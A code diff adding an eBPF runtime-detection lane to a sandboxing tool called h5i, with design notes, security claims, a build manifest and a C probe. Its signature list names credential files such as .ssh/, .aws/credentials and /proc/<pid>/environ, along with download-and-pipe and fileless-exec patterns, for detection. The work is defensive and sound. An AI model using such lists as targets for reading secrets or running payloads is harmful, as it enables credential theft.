+The `mode` field in the config map is where a cgroup or namespace filter would
+go, and the probe is written so that adding one is additive. The natural
+consumer is the privilege-separated collector of D13.1, which attaches out of
+band and *can* therefore resolve either. Nothing in v1 uses it, so nothing in
+v1 ships it.
+
+**Coverage.** The tiers are not equally covered, and the record says so per run
+rather than in a footnote:
+
+| tier | coverage | why |
+|---|---|---|
+| workspace | `full` | the payload is a direct descendant of h5i |
+| process | `full` | same, plus everything it spawns |
+| supervised | `full` | same, and the supervisor is in the tree too |
+| container | `partial` | Podman's `conmon` double-forks and reparents, so the workload leaves h5i's tree; what stays visible is the runtime's own activity on the host |
+| microvm | `none` | the workload runs against a *guest* kernel; a host probe cannot see its syscalls at all, and pretending otherwise would be the worst available failure |
+| anything else | `none` | an unknown tier is uncovered, never assumed covered — guessing permissively is the one mistake that turns an absence of evidence into a clean bill of health |
+
+`partial` and `none` are written into the receipt as facts, each with its
+reason attached. A reviewer reading a container-tier record sees
+`coverage: partial` and the sentence explaining it, which is the difference
+between "we looked and found nothing" and "we could not look".
+
+One honest consequence of seeding from h5i's own tree: any process h5i spawns
+*during the run window* is inside the scope. On the kernel tiers that is the
+payload and nothing else, because the window opens immediately before
+`run_with_env` and closes immediately after it. On the container tier it is
+also the container runtime, which is exactly why that tier is `partial` rather
+than wrong.
+
+## D7. The event model and the wire format
+
+Twelve tracepoints, one fixed-size event struct, one ring buffer. The struct
+is `#[repr(C)]` on the Rust side and a plain `struct` in the probe, with a
+compile-time assertion on each side that they agree in size, plus a runtime
+magic-and-version word in every event so a mismatched pair is detected at the
+first record rather than silently misparsed.
+
+The events, and the syscalls behind them:
+
+| kind | source tracepoints | captured |
+|---|---|---|
+| `Exec` | `sys_enter_execve`, `sys_enter_execveat` | path, first argument, argc |
+| `Open` | `sys_enter_openat`, `sys_enter_openat2` | path, flags, write-intent bit |
+| `Connect` | `sys_enter_connect` | family, IPv4/IPv6 address, port |
+| `Socket` | `sys_enter_socket` | family, type, protocol |
+| `Ptrace` | `sys_enter_ptrace` | request, target pid |
+| `Bpf` | `sys_enter_bpf` | command |
+| `Nsop` | `sys_enter_unshare`, `sys_enter_setns` | flags |
+| `Module` | `sys_enter_init_module`, `sys_enter_finit_module` | — |
+| `Memfd` | `sys_enter_memfd_create` | name |
+| `Mount` | `sys_enter_mount`, `sys_enter_pivot_root` | target path |
+| `Fork` | `sched_process_fork` | child pid |
+| `Exit` | `sched_process_exit` | — |
+
+Every event carries `ts_ns`, `pid`, `tgid`, `ppid` where known, `uid`,
+`comm[16]`, and one 256-byte payload area interpreted per kind. Fixed size
+throughout: a variable-size ring buffer record would need a second length
+field the verifier has to be convinced about, for a saving that does not
+matter at these volumes.
+
+**Volume control lives in the kernel, not in userspace.** `openat` is the
+loudest syscall a build makes, and shipping every one of them to userspace to
+throw away 99% is how a detector becomes a performance problem people turn
+off. So the probe filters `Open` in-kernel to two cases: write intent
+(`O_WRONLY|O_RDWR|O_CREAT|O_TRUNC|O_APPEND`), or a path whose first bytes
+match one of a small set of prefixes loaded into a map from userspace. The
+prefix set is the credential-path list the signatures care about (D9), pushed
+down so the rule's own vocabulary decides what the kernel sends.
+
+## D8. The ring buffer, loss, and back pressure
+
+`BPF_MAP_TYPE_RINGBUF`, 256 KiB by default, read by a dedicated thread that
+`poll(2)`s the map fd and hands decoded events to the session over a channel.
+The buffer size is a policy knob because a `cargo build` and a `sleep 1` do
+not need the same buffer.
+
+Loss is counted, never hidden. A `bpf_ringbuf_reserve` that fails increments a
+per-CPU counter in a second map; the session reads that counter at stop time
+and puts it in the record as `events_lost`. A run with a nonzero
+`events_lost` is not a failed run and not a clean one — it is a run whose
+detection list is a lower bound, and the console renders it that way.
+
+The reader thread is bounded by the run: it starts before the child spawns,
+stops when the run returns, and is joined with a timeout so a wedged reader
+can never outlive the command it was watching. Its channel is bounded too;
+when userspace cannot keep up, the *channel* drops and counts, so a slow
+consumer degrades the same way a full kernel buffer does, into a number in the
+record.
+
+## D9. The signatures
+
+A signature is a pure function from an event stream to zero or more
+detections. No I/O, no clock, no allocation per event beyond what it stores,
+and therefore unit-testable against synthetic streams — which is how all of
+them are tested, since attaching a probe needs privileges CI does not have.
+
+Seventeen rules ship, in five families (`net`, `secret`, `exec`, `priv`,
+`kernel`, `mount` — the last two are one family of concern split by what they
+name). Each has a stable id, a severity
+(`info`, `notice`, `alert`), a one-line human description, and a bounded
+exemplar list so a flood becomes a count rather than a megabyte.
+
+**Network** — the family that matters most, because it is the one the egress
+proxy structurally cannot see:
+
+- `net.direct-egress` (**alert**) — `connect(2)` to a routable address on a
+  box whose network policy is an allowlist or a denial. This is the allowlist
+  being routed around, and on the workspace tier (no netns) it is the *only*
+  thing that would notice. It reports the **attempt**: the probe sees the
+  syscall going in, not the answer coming back, so a connect a network
+  namespace refused looks exactly like one that succeeded. On a
+  `net.mode = deny` box that is the useful reading — the box tried.
+- `net.raw-socket` (**alert**) — `AF_PACKET`, or `SOCK_RAW` on any family.
+- `net.unix-socket` (**notice**) — `AF_UNIX` connect on a profile that did
+  not set `unix_sockets`. The supervised tier denies these already; on the
+  other tiers nothing did.
+- `net.dns-direct` (**notice**) — connect to port 53 or 853.
+
+**Credentials and secrets** — the family the filesystem grants cannot express,
+because a grant is a directory and a credential is a file inside it:
+
+- `secret.read` (**alert**) — an open of `.ssh/`, `.aws/credentials`,
+  `.config/gh/`, `.git-credentials`, `.netrc`, `.kube/config`,
+  `.docker/config.json`, `.npmrc`, `.pypirc`, `.gnupg/`.
+- `secret.dotenv` (**notice**) — an open of a `.env`-family file outside the
+  workspace.
+- `secret.proc-environ` (**alert**) — an open of `/proc/<pid>/environ` for a
+  pid outside the box, which is the classic read of the host's secrets.
+- `secret.h5i-state` (**alert**) — a write-intent open under the box's own
+  `.h5i/` control directory, which is the box editing its own evidence.
+
+**Execution** — the family that catches the shape of a supply-chain payload:
+
+- `exec.from-tmp` (**notice**) — exec of a path under `/tmp`, `/var/tmp` or
+  `/dev/shm`.
+- `exec.memfd` (**alert**) — `memfd_create` followed by an exec of
+  `/proc/self/fd/<n>` or `/proc/<pid>/fd/<n>` in the same process: fileless
+  execution, and the reason `Memfd` is collected at all.
+- `exec.interpreter-pipe` (**notice**) — a shell exec whose first argument is
+  `-c` and whose command line contains a download-and-pipe shape.
+- `exec.package-manager` (**info**) — npm/pip/cargo/gem/go invoked; not
+  suspicious, and present because "what installed things" is the first
+  question asked of any supply-chain incident.
+
+**Privilege and kernel** — the family that is uninteresting until it is not:
+
+- `priv.ptrace` (**alert**) — any `ptrace` attach to a process the box did
+  not spawn.
+- `priv.namespace` (**notice**) — `unshare`/`setns`. The supervised tier
+  denies `unshare` outright; this is what the other tiers get.
+- `kernel.bpf` (**alert**) — the box calling `bpf(2)`.
+- `kernel.module` (**alert**) — `init_module`/`finit_module`.
+- `mount.change` (**notice**) — `mount`/`pivot_root` inside the box.
+
+Rules are data, not code paths: the engine holds a table, and `h5i box detect
+rules` prints it, so what the detector looks for is inspectable without
+reading Rust.
+
+## D10. Where it lands
+
+**The receipt.** A new optional `runtime` block on `ExecRecord`, appended last
+and `skip_serializing_if` empty, so every existing record's shape and every
+pinned digest is unchanged — the discipline `unix_sockets`, `loopback_ports`
+and `engine` established on `Profile`. It carries the lane string
+(`kernel-bpf`), the scope kind, the coverage, `events_seen`, `events_lost`,
+the detections, and `unavailable` with a reason when the detector could not
+attach. `source` on the record itself does **not** change: the run is still
+`host-env-run`, and the kernel lane is a block inside it, because the record
+is about the command and the block is a second observer of the same command.
+
+**The console.** `h5i ui` gains a runtime row per record, badged by the
+highest severity present, grey when the detector did not run. This obeys the
+console's honesty model (`box-console-honesty-model`): it is counting over
+receipts, not scoring, and grey means "no evidence", never "clean".
+
+**The export.** The export report renders the detections for every record it
+carries, and an export whose records have `coverage: none` says that in the
+report rather than showing an empty list.
+
+**The CLI.** `h5i box detect probe` (what this host can do, and the exact
+command to fix what it cannot), `h5i box detect rules` (the table), and
+`h5i box detect show <name>` (the detections across a box's records, with
+`--json`).
+
+## D11. Policy surface
+
+```toml
+[profile.agent.detect]
+enabled = true      # attach the probe for runs under this profile
+require  = false    # refuse to run when the probe cannot attach
+buffer_kb = 256     # ring buffer size
+rules = ["*"]       # rule ids or families to enable; "*" is all
+```
+
+Four fields, all optional, all appended last on `Profile` so no existing
+profile's canonical serialization or pinned digest moves. `enabled` defaults
+to false: turning on a kernel facility for every user by default, when it
+needs privileges most users have not granted, would produce a fleet of
+`unavailable` blocks and teach everyone to ignore them.
+
+`require = true` is the fail-closed switch and it means what it says: if the
+probe cannot attach, `h5i box run` refuses, with the probe's reason. That is
+the setting for the "I am running somebody else's dependency tree" case, and
+it is off by default because the failure mode of a mandatory detector on a
+laptop kernel is a tool that does not start.
+
+## D12. What it refuses to do
+
+- **No enforcement, in any form.** No `bpf_send_signal`, no
+  `bpf_override_return`, no LSM programs. Not "not yet": a detector that can
+  block has to answer for the gap between observing an argument and the
+  kernel using it (the TOCTOU that makes syscall-argument enforcement unsound
+  in general), and h5i has a policy layer that does not have that gap. The
+  two must not be confused, and the way to keep them unconfused is that this
+  one has no verb.
+- **No BPF LSM.** `CONFIG_BPF_LSM=y` is common but `lsm=…,bpf` on the kernel
+  command line is not, so an LSM-based collector would be unavailable on most
+  hosts including this one. Syscall tracepoints work everywhere.
+- **No CO-RE, no `vmlinux.h`, no BTF requirement** (D5).
+- **No daemon, no persistent attachment.** The probe is loaded for a run and
+  unloaded when the run ends. Nothing survives the command.
+- **No privilege escalation of its own.** h5i does not `sudo`, does not
+  install a helper, and does not ask for setuid. It uses the capabilities the
+  process already has, and when it does not have them it says which ones and
+  how to grant them.
+
+## D13. Limits, stated up front
+
+1. **It needs `CAP_BPF` and `CAP_PERFMON`** (or root). h5i runs as an ordinary
+   user, so on a stock install the answer is `unavailable: missing CAP_BPF`
+   plus the one-line `setcap` command. A privilege-separated collector — a
+   tiny setcap'd helper that owns the probe and streams events over a socket,
+   so the rest of h5i keeps no capabilities — is the right long-term shape and
+   is **not built here**. The seam for it is real rather than aspirational:
+   `Watch` is one type for "watching" and "could not watch", every caller goes
+   through it, and the probe's config map already carries a `mode` field for
+   the cgroup and namespace scopes such a collector could resolve (D6). What
+   would change is `session.rs` and nothing above it.
+2. **Linux 5.8 or newer**, for `BPF_MAP_TYPE_RINGBUF`. Older kernels get
+   `unavailable`, never a silent fallback to perf buffers.
+3. **`sys_enter` arguments are the caller's, not the kernel's resolution.** A
+   path in an `Open` event is the string the process passed; symlinks,
+   relative paths against an `openat` dirfd, and races between the argument
+   read and the kernel's use of it are all unresolved. Every rule that matches
+   on a path is therefore a *heuristic over caller-supplied strings*, and the
+   record labels the path field as such. Argument capture at `sys_enter` is
+   what makes the probe CO-RE-free, and this is the price.
+4. **The container tier is `partial` and the microVM tier is `none`** (D6).
+5. **Pid reuse can, in principle, admit a foreign process** into a `pidtree`
+   scope, between an exit h5i has not yet seen and a fork the kernel reuses
+   the pid for. The window is a single scheduler quantum and the mitigation
+   (a per-pid generation counter) costs more than the exposure is worth for
+   an observation-only lane. Stated, not fixed.
+6. **A box with CAP_SYS_ADMIN on the host kernel defeats it.** No h5i box has
+   that; the sentence exists so nobody has to work out whether it does.
+7. **`sys_enter` sees attempts, not outcomes.** The probe is on the way *in* to
+   the syscall, so a `connect` the network namespace refused, an `openat` that
+   returned `EACCES` and a `ptrace` the kernel denied all look exactly like the
+   ones that succeeded. Attaching `sys_exit` as well would fix this and would
+   double the event volume for a distinction that, on a *confined* box, is
+   usually the less interesting half: "the box tried to reach 8.8.8.8" is the
+   finding, and whether Landlock or the netns stopped it is already answered by
+   the policy. The rules that could be misread because of this say so in their
+   own text.
+8. **The read-only `openat` feed is filtered in the kernel**, to write intent
+   plus a bounded set of path prefixes plus a `/.env` scan (D7). A read of a
+   credential path nobody listed is not collected and therefore cannot fire a
+   rule. `[detect] open_all = true` removes the filter and is honest about what
+   it costs: a `cargo build` produces six figures of `openat`.
+
+## D14. The order
+
+1. **D14.1 — The crate skeleton.** `crates/h5i-bpf`: probe, event model,
+   rules and evidence types, all pure Rust, compiling on every target in the
+   release matrix. No aya yet. *Exit: `cargo clippy --workspace --all-targets`
+   green on Linux and Darwin; the rules engine unit-tested against synthetic
+   event streams.*
+2. **D14.2 — The probe.** `bpf/h5i_detect.bpf.c` plus the build script that
+   compiles it when `clang` can target BPF, stubs it when it cannot, and hard
+   fails under `H5I_BPF_REQUIRE=1`. *Exit: the object builds on this host and
+   `bpftool`-less verification that its sections and maps are what the loader
+   expects.*
+3. **D14.3 — The loader.** aya session: load, verify tracepoint formats, program
+   the scope, attach, read the ring buffer, stop and account. Linux only, behind
+   the crate's own default feature so CI lints it. *Exit: `detect probe` reports
+   the host truthfully — including "missing CAP_BPF" on an unprivileged one —
+   and the live attach test passes as root.*
+4. **D14.4 — The run seam.** Wire the session around `sandbox::run_with_env`
+   in `env run` and `env shell`, resolve the scope per tier, and put the block
+   in the receipt. *Exit: a run under a `detect`-enabled profile carries a
+   `runtime` block; a run on a host without the capability carries the block
+   with its reason; `require = true` refuses.*
+5. **D14.5 — The surfaces.** Policy parsing, `h5i box detect` verbs, the
+   console row, the export report, `box status`, `box capabilities`, MANUAL,
+   SECURITY, and the generated manuals regenerated. *Exit: the docs job is
+   green, which is the only way the CLI and the manual can agree.*
+
+### D14.6. What was demonstrated, and what was not
+
+All five steps are built, 2026-08-19. Stated precisely, because "built" and
+"demonstrated" are not the same word:
+
+**Demonstrated.**
+
+- The probe compiles with `clang -target bpf -O2 -g -Wall -Werror` and produces
+  the seventeen tracepoint programs, the five maps, the `license` section and
+  `.BTF`. `tests/detect_integration.rs` builds it under `H5I_BPF_REQUIRE=1`,
+  which is the setting that turns "no clang" into a build failure.
+- The wire contract is held from both ends: a compile-time size assertion on
+  the Rust struct, a magic-and-version check on every record, and a test that
+  parses the C header and compares every constant and every event-kind number
+  against the Rust enum. A third test parses the probe source and fails if it
+  declares a tracepoint program the loader's attach table does not name.
+- The rules engine is tested against synthetic event streams — every rule
+  fires, and a table-driven test fails if a rule is listed in the catalogue and
+  unreachable from `observe`. Both directions of each judgement call are
+  covered: a LAN address *is* egress, loopback is not, the proxy's own endpoint
+  is not, a granted `unix_sockets` profile is not reported for using them, a
+  box reading *its own* `/proc/<pid>/environ` is not reported.
+- The end-to-end wiring is tested on a host with **no** `CAP_BPF`, which is the
+  common case and the one most likely to be got wrong: a profile that did not
+  ask carries no block, a profile that asked carries a block with the reason,
+  `require = true` refuses the run and names the setting, a misspelled rule id
+  surfaces in the receipt, and enabling detection changes the pinned policy
+  digest.
+
+**Not demonstrated.** The attach itself. Loading a program and binding it to a
+tracepoint needs `CAP_BPF` and `CAP_PERFMON`, which this machine's h5i does not
+have and which `cargo test` should not acquire. That path lives in
+`crates/h5i-bpf/tests/live_attach.rs`, behind `H5I_BPF_LIVE=1`, and it skips
+*loudly* — printing the reason — rather than passing quietly. Until somebody
+runs it on a host with the capability, the honest claim is: the probe compiles,
+the loader is written against a pinned aya, the verifier has not seen it.
+
+Two specific things that first run is checking, both stated so a failure is
+diagnosable rather than surprising:
+
+1. **The verifier's opinion of the `openat` program**, which is the big one at
+   roughly ten thousand instructions after the prefix loop and the `/.env` scan
+   are unrolled. Well inside the one-million limit, and the largest unverified
+   thing here.
+2. **The tracepoint field offsets**, which the loader checks against
+   `/sys/kernel/tracing/events/.../format` when that file is readable. It
+   usually is not (tracefs is root-only), in which case the documented layout
+   is used and the check is skipped — never silently, the probe report says
+   `tracefs = no` and what that costs.

--- a/ROADMAP.md
+++ b/ROADMAP.md
@@ -7911,6 +7911,32 @@ the setting for the "I am running somebody else's dependency tree" case, and
 it is off by default because the failure mode of a mandatory detector on a
 laptop kernel is a tool that does not start.
 
+### D11.1. Opt-in, at three layers, and the one that is easy to get wrong
+
+"Is this optional?" has to have exactly one answer, and it takes three
+defaults to give it one:
+
+| Layer | Switch | Default | What it decides |
+|---|---|---|---|
+| build | `h5i/bpf` → `h5i-core/bpf` → `h5i-bpf/load` | **off** | whether the binary carries aya and a compiled probe at all |
+| host | `CAP_BPF` + `CAP_PERFMON` | not granted | whether it can attach |
+| policy | `[profile.X.detect] enabled` | **false** | whether a given box is watched |
+
+What is *not* optional is the evidence types: `h5i-core` depends on `h5i-bpf`
+unconditionally with `default-features = false`, so a build with no collector
+can still read and render a receipt written by one that had it. A feature flag
+that changed a serialized record's shape would make yesterday's evidence
+unreadable after an upgrade, which is a worse failure than the one it saves.
+
+The subtle layer is the **crate's own default**. `h5i-bpf` was written with
+`default = ["load"]`, so that the main `clippy --workspace --all-targets` job
+would lint the loader. Cargo unifies features across a workspace build, so the
+consequence was that `cargo build --workspace` pulled aya and ran a clang
+invocation for every contributor, while `cargo install --path .` did not —
+"optional" had two answers depending on how you built. The default is now `[]`,
+and the dedicated CI job passes `--features bpf` explicitly, which lints and
+tests the same code without making it arrive uninvited.
+
 ## D12. What it refuses to do
 
 - **No enforcement, in any form.** No `bpf_send_signal`, no
@@ -7988,10 +8014,13 @@ laptop kernel is a tool that does not start.
    `bpftool`-less verification that its sections and maps are what the loader
    expects.*
 3. **D14.3 — The loader.** aya session: load, verify tracepoint formats, program
-   the scope, attach, read the ring buffer, stop and account. Linux only, behind
-   the crate's own default feature so CI lints it. *Exit: `detect probe` reports
-   the host truthfully — including "missing CAP_BPF" on an unprivileged one —
-   and the live attach test passes as root.*
+   the scope, attach, read the ring buffer, stop and account. Linux only, and
+   behind `h5i-bpf/load`, which is **off by default like every other switch in
+   this lane** — see D11 on why the crate default is the one that is easiest to
+   get wrong. The dedicated CI job is what asks for it, and therefore what lints
+   and tests it. *Exit: `detect probe` reports the host truthfully — including
+   "missing CAP_BPF" on an unprivileged one — and the live attach test passes as
+   root.*
 4. **D14.4 — The run seam.** Wire the session around `sandbox::run_with_env`
    in `env run` and `env shell`, resolve the scope per tier, and put the block
    in the receipt. *Exit: a run under a `detect`-enabled profile carries a

--- a/SECURITY.md
+++ b/SECURITY.md
@@ -106,8 +106,9 @@ The claims:
   digested at box creation, and every receipt names the digest in force, so
   "what the policy was" is not a matter of trust.
 - **Evidence is labeled by who observed it.** A denial recorded by the egress
-  proxy is host-observed; a command the box reported is box-claimed. h5i keeps
-  those apart wherever they are shown, and does not average them into a score.
+  proxy is host-observed; a command the box reported is box-claimed; a run an
+  eBPF collector watched from the kernel is kernel-observed. h5i keeps those
+  apart wherever they are shown, and does not average them into a score.
 - **Credentials stay out of the box** where the design allows it. The provider
   token lives in the host proxy's memory and the box sees a base URL and a
   dummy.
@@ -159,6 +160,33 @@ The non-goals, which matter just as much:
 - **Chrome inside a box runs with its own sandbox off**, because the seccomp
   deny-list blocks the namespace syscalls it needs. The box is the boundary;
   Chrome's own is one layer you do not have.
+- **Runtime detection observes; it never denies.** The eBPF collector
+  (`[profile.X.detect]`, ROADMAP.md D1–D14) reports what a box's processes did.
+  It contains nothing, and it is deliberately built so that it cannot: there is
+  no `bpf_send_signal`, no `bpf_override_return` and no LSM program anywhere in
+  it. Confinement stays with Landlock, seccomp, the network namespace and the
+  egress proxy. A `runtime` block in a receipt is never evidence that something
+  was stopped.
+- **A detection list is a lower bound, not a verdict.** A signature only fires
+  on what it models, and `h5i box detect rules` is a finite list. A run with no
+  detections means "nothing the catalogue models happened", never "nothing
+  happened". Where the record can be more precise it is: the block carries the
+  event count, the number of events dropped, how much of the tier the scope
+  covered, and — when the probe could not attach at all — the reason, so an
+  unwatched run can never be read as a quiet one.
+- **The collector's evidence is caller-supplied strings, seen going in.** Paths
+  and command lines come from syscall arguments captured at `sys_enter`: they
+  are not the kernel's resolution of those strings, and the probe sees the
+  attempt rather than the outcome. A `connect` a network namespace refused
+  looks exactly like one that succeeded.
+- **Running the collector needs capabilities h5i does not otherwise want.**
+  `CAP_BPF` and `CAP_PERFMON` are what loading a program and attaching it to a
+  tracepoint cost, and `setcap`-ing the h5i binary grants them to *all* of h5i,
+  not just to the collector. h5i never grants them to itself, never invokes
+  `sudo`, and prints the command rather than running it, so the decision stays
+  yours. A privilege-separated collector — a small setcap'd helper that owns
+  the probe and streams events over a socket — is the right long-term shape and
+  is not built (ROADMAP.md D13.1).
 - **h5i does not guarantee that all secrets are detected**, nor complete
   redaction of prompts, transcripts, or command output.
 - **h5i does not guarantee a malicious repository cannot exploit your editor,
@@ -323,6 +351,22 @@ cargo test   --locked --workspace
 
 If your change touches the console or the release build path, also verify the
 Node build path used by CI and release packaging.
+
+If your change touches the runtime-detection lane, also run it with the probe
+actually compiled, since the default build leaves it out:
+
+```bash
+H5I_BPF_REQUIRE=1 cargo clippy --locked --workspace --all-targets --features bpf -- -D warnings
+H5I_BPF_REQUIRE=1 cargo test   --locked --features bpf --test detect_integration
+```
+
+And, on a host where you have the capability, the live attach — the one path CI
+cannot exercise:
+
+```bash
+sudo -E env "PATH=$PATH" H5I_BPF_LIVE=1 \
+    cargo test -p h5i-bpf --test live_attach -- --nocapture
+```
 
 ## Disclosure Process
 

--- a/crates/h5i-bpf/Cargo.toml
+++ b/crates/h5i-bpf/Cargo.toml
@@ -6,15 +6,23 @@ description = "h5i runtime detection: a kernel-observed evidence lane built on e
 
 [features]
 # `load` is what turns the crate from a model into a collector: aya, the
-# compiled probe object, and the attach/read path. On by default so the
-# workspace's `clippy --workspace --all-targets` lints it on the Linux job —
-# the root binary's own `bpf` feature is what decides whether a *release*
-# carries any of this, and that one is off (ROADMAP.md D11).
+# compiled probe object, and the attach/read path.
+#
+# **Off by default, and the default matters more than it looks.** Cargo unifies
+# features across a `--workspace` build, so a crate whose own default turned
+# `load` on would put aya and a clang invocation into every `cargo build
+# --workspace` — including builds by contributors who never asked for the
+# detector and never passed `--features bpf`. It was written that way first, to
+# get the loader linted by the main CI job, and the price was that "is this
+# optional?" had two different answers depending on how you built. It has one
+# now: the collector arrives only when something explicitly asks for it. The
+# dedicated `bpf` CI job asks, which is where the loader is linted and tested.
 #
 # Everything outside `session` compiles with the feature off, on every target
 # in the release matrix, which is what keeps the event model, the rules and the
-# receipt types testable on a Mac.
-default = ["load"]
+# receipt types testable on a Mac — and what lets a build with no collector
+# still *read* a receipt written by one that had it.
+default = []
 load = ["dep:aya", "dep:libc"]
 
 [dependencies]

--- a/crates/h5i-bpf/Cargo.toml
+++ b/crates/h5i-bpf/Cargo.toml
@@ -1,0 +1,37 @@
+[package]
+name = "h5i-bpf"
+version = "0.1.0"
+edition = "2024"
+description = "h5i runtime detection: a kernel-observed evidence lane built on eBPF syscall tracepoints (ROADMAP.md D1–D14)."
+
+[features]
+# `load` is what turns the crate from a model into a collector: aya, the
+# compiled probe object, and the attach/read path. On by default so the
+# workspace's `clippy --workspace --all-targets` lints it on the Linux job —
+# the root binary's own `bpf` feature is what decides whether a *release*
+# carries any of this, and that one is off (ROADMAP.md D11).
+#
+# Everything outside `session` compiles with the feature off, on every target
+# in the release matrix, which is what keeps the event model, the rules and the
+# receipt types testable on a Mac.
+default = ["load"]
+load = ["dep:aya", "dep:libc"]
+
+[dependencies]
+h5i-error = { path = "../h5i-error" }
+serde = { workspace = true }
+serde_json = { workspace = true }
+
+# The loader. Pure Rust: no libbpf, no libelf, no bindgen, and therefore no
+# new native link-time dependency for the musl targets the release matrix
+# cross-builds (ROADMAP.md D4). Linux-only by construction — the whole
+# `session` module is `cfg(target_os = "linux")`, so a Darwin or Windows build
+# never sees this dependency at all.
+[target.'cfg(target_os = "linux")'.dependencies]
+aya = { version = "0.14", optional = true }
+# `poll(2)` on the ring buffer fd, `capget(2)` for the CAP_BPF probe, and
+# `setrlimit(RLIMIT_MEMLOCK)` for kernels that still charge maps against it.
+libc = { version = "0.2.186", optional = true }
+
+[dev-dependencies]
+serde_json = { workspace = true }

--- a/crates/h5i-bpf/bpf/h5i_bpf.h
+++ b/crates/h5i-bpf/bpf/h5i_bpf.h
@@ -1,0 +1,107 @@
+/* SPDX-License-Identifier: (BSD-2-Clause OR GPL-2.0)
+ *
+ * h5i_bpf.h — the whole BPF-side runtime, vendored.
+ *
+ * There is deliberately no `#include` of anything in this file. Not of
+ * <linux/bpf.h> (its include chain reaches asm/types.h, which is absent on a
+ * host with no arch headers installed — this one, for instance), and not of
+ * libbpf's bpf_helpers.h (libbpf is not a build dependency and adding one
+ * would undo the reason aya was chosen; ROADMAP.md D4).
+ *
+ * What that costs is the twenty-odd constants and prototypes below, all of
+ * them stable kernel ABI. What it buys is that the probe compiles with
+ * nothing but `clang -target bpf`, which is the difference between a feature
+ * every contributor can build and one that needs a package install first.
+ *
+ * Everything here is UAPI-stable. Nothing here describes a kernel *structure*
+ * — that is the CO-RE cut (ROADMAP.md D5), and it is what lets one object
+ * load on every kernel from 5.8 up without BTF, without vmlinux.h and
+ * without a relocating loader.
+ */
+
+#ifndef H5I_BPF_H
+#define H5I_BPF_H
+
+typedef unsigned char __u8;
+typedef signed char __s8;
+typedef unsigned short __u16;
+typedef short __s16;
+typedef unsigned int __u32;
+typedef int __s32;
+typedef unsigned long long __u64;
+typedef long long __s64;
+
+#define SEC(NAME) __attribute__((section(NAME), used))
+#define __always_inline inline __attribute__((always_inline))
+
+/* BTF map definitions expand to pointer-to-array types whose array length
+ * carries the value. This is libbpf's encoding and aya parses the same one;
+ * spelling the macros here rather than including them changes nothing about
+ * the bytes clang emits. */
+#define __uint(name, val) int (*name)[val]
+#define __type(name, val) typeof(val) *name
+#define __array(name, val) typeof(val) *name[]
+
+/* enum bpf_map_type — the four this probe uses. */
+#define BPF_MAP_TYPE_HASH 1
+#define BPF_MAP_TYPE_ARRAY 2
+#define BPF_MAP_TYPE_PERCPU_ARRAY 6
+#define BPF_MAP_TYPE_RINGBUF 27
+
+/* map update flags */
+#define BPF_ANY 0
+#define BPF_NOEXIST 1
+#define BPF_EXIST 2
+
+/* Helper ids, in __BPF_FUNC_MAPPER order. Every one of these is stable: a
+ * helper's id is part of the kernel's ABI and is never reused. */
+static void *(*bpf_map_lookup_elem)(void *map, const void *key) = (void *)1;
+static long (*bpf_map_update_elem)(void *map, const void *key, const void *value,
+                                   __u64 flags) = (void *)2;
+static long (*bpf_map_delete_elem)(void *map, const void *key) = (void *)3;
+static __u64 (*bpf_ktime_get_ns)(void) = (void *)5;
+static __u64 (*bpf_get_current_pid_tgid)(void) = (void *)14;
+static __u64 (*bpf_get_current_uid_gid)(void) = (void *)15;
+static long (*bpf_get_current_comm)(void *buf, __u32 size_of_buf) = (void *)16;
+static long (*bpf_probe_read_user)(void *dst, __u32 size,
+                                   const void *unsafe_ptr) = (void *)112;
+static long (*bpf_probe_read_user_str)(void *dst, __u32 size,
+                                       const void *unsafe_ptr) = (void *)114;
+static void *(*bpf_ringbuf_reserve)(void *ringbuf, __u64 size, __u64 flags) = (void *)131;
+static void (*bpf_ringbuf_submit)(void *data, __u64 flags) = (void *)132;
+static void (*bpf_ringbuf_discard)(void *data, __u64 flags) = (void *)133;
+
+/* The syscall-entry tracepoint context.
+ *
+ * This is the one layout the probe depends on, and it is fixed ABI: the four
+ * `common_*` fields occupy the first eight bytes on every architecture, the
+ * syscall number follows in the next eight, and the six arguments are
+ * register-width from there. The loader re-checks it against
+ * /sys/kernel/tracing/events/.../format when that file is readable and
+ * refuses to attach if a kernel ever moved a field, so a wrong assumption
+ * here fails loudly instead of misreading arguments (ROADMAP.md D5). */
+struct h5i_sys_enter {
+    __u64 common;
+    __s64 syscall_nr;
+    __u64 args[6];
+};
+
+/* sched:sched_process_fork. Field offsets from the tracepoint's `format`:
+ * parent_comm[16] at 8, parent_pid at 24, child_comm[16] at 28,
+ * child_pid at 44. Checked by the loader, same as above. */
+struct h5i_sched_fork {
+    __u64 common;
+    char parent_comm[16];
+    __s32 parent_pid;
+    char child_comm[16];
+    __s32 child_pid;
+};
+
+/* sched:sched_process_exit. comm[16] at 8, pid at 24. */
+struct h5i_sched_exit {
+    __u64 common;
+    char comm[16];
+    __s32 pid;
+};
+
+#endif /* H5I_BPF_H */

--- a/crates/h5i-bpf/bpf/h5i_detect.bpf.c
+++ b/crates/h5i-bpf/bpf/h5i_detect.bpf.c
@@ -1,0 +1,638 @@
+/* SPDX-License-Identifier: (BSD-2-Clause OR GPL-2.0)
+ *
+ * h5i_detect.bpf.c — the kernel half of h5i's runtime detection lane
+ * (ROADMAP.md D1–D14).
+ *
+ * Twelve syscall/scheduler tracepoints, one fixed-size event, one ring
+ * buffer. It reads no kernel structure, calls no unstable helper, and needs
+ * neither BTF nor vmlinux.h at build time or at run time (D5).
+ *
+ * It cannot block anything. There is no `bpf_send_signal`, no
+ * `bpf_override_return`, and no LSM program in this file, and that is a
+ * design decision rather than an unfinished one: enforcement in h5i lives in
+ * the mechanisms that fail closed by construction — Landlock, seccomp, the
+ * network namespace, the egress proxy — and a second thing that sometimes
+ * denies would blur a boundary that is currently sharp (D12).
+ *
+ * Licence: the object is "Dual BSD/GPL" because several helpers it calls are
+ * GPL-only in the kernel's view (`bpf_probe_read_user_str` among them), and a
+ * BSD-only object would simply be refused at load. The repository is Apache
+ * 2.0; this file carries the dual notice so both the kernel's requirement and
+ * the project's licence are satisfied for the one artifact that needs it.
+ */
+
+#include "h5i_bpf.h"
+#include "h5i_event.h"
+
+char _license[] SEC("license") = "Dual BSD/GPL";
+
+/* ------------------------------------------------------------------ maps */
+
+struct {
+    __uint(type, BPF_MAP_TYPE_RINGBUF);
+    /* Overridden by the loader from the profile's `buffer_kb`; this default
+     * is the one a `cargo build` was sized against. */
+    __uint(max_entries, 262144);
+} H5I_EVENTS SEC(".maps");
+
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __uint(max_entries, 16384);
+    __type(key, __u32);
+    __type(value, __u8);
+} H5I_TRACKED SEC(".maps");
+
+struct {
